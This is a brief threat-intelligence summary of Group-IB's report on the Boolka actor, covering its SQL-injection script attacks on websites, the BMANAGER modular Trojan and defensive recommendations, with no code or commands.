Group-IB has uncovered the activities of the threat actor known as Boolka, revealing their sophisticated malware operations and web attack strategies. Since 2022, Boolka has exploited vulnerabilities via SQL injection attacks, targeting websites across multiple countries. Their injected malicious scripts intercept user inputs, allowing the theft of sensitive data such as passwords and usernames.
In January 2024, Group-IB identified a landing page associated with Boolka’s operations, which was used to distribute the BMANAGER modular Trojan. This Trojan is part of Boolka’s advanced malware delivery platform, which employs the BeEF framework and a modified Django admin page to enhance its effectiveness. The malicious JavaScript deployed by Boolka captures and exfiltrates user information back to their servers.
Boolka’s malware infrastructure has shown considerable evolution, with dynamic updates to their scripts to evade detection. By late 2023, Boolka’s payloads included new checks and functionalities, such as hidden web page elements. The BMANAGER Trojan, notable for its modular design, is used to perform various malicious activities including data exfiltration, keylogging, and file stealing.
To defend against threats like the BMANAGER Trojan, organizations should maintain up-to-date systems, use advanced endpoint protection, monitor network traffic, and educate employees on safe browsing practices. Group-IB’s findings highlight the need for robust security measures in the face of increasingly sophisticated cyber threats.
Reference: